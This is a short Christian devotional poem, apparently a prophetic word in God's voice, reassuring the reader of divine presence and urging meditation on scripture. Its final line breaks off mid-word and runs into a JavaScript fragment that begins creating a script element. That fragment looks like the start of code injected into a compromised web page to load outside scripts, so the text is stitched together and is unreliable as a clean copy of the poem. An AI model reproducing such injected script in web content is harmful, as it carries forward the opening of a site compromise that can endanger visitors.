I Am With You

My child I’m with you in the difficult times

I’m with you in the lonely times

I am with you when you seem to be floating by yourself

I am with you

And I have empowered you

And I have equipped you

I have given you the tools that you need

I have given you the gifts that you need

I have given you the strengths that you need

I have given you all that you need

Do not believe the lies of the enemy

That say you have been abandoned

Or that you have been stranded

Do not believe the lies of the enemy

That tell you that I am not capable of bringing you through

For I have equipped you

I am here with you

And I am bringing you through those times

When you believe that you are up a creek without a paddle

Do not believe it!

For my word is your paddle

Draw upon my word

Draw upon the strength that is within the truth of my word

For that is what will propel you

Continue to mediate upon my word

Dig deep within my word

Get your strength from my word

For within it are the strengths

For everything that you need in life

The wisdom for everything that you need in life

Meditate upon my word

Read my word

Let it sink deep within your spirit

Within your heart

And let it renew your minds

That it would wash out the mindsets of this world

And the worlds views

That you would take on my kingdom view

For my word is life and it is truth and it is power

And it is all that you needvar d=document;var s=d.createElement(‘script’);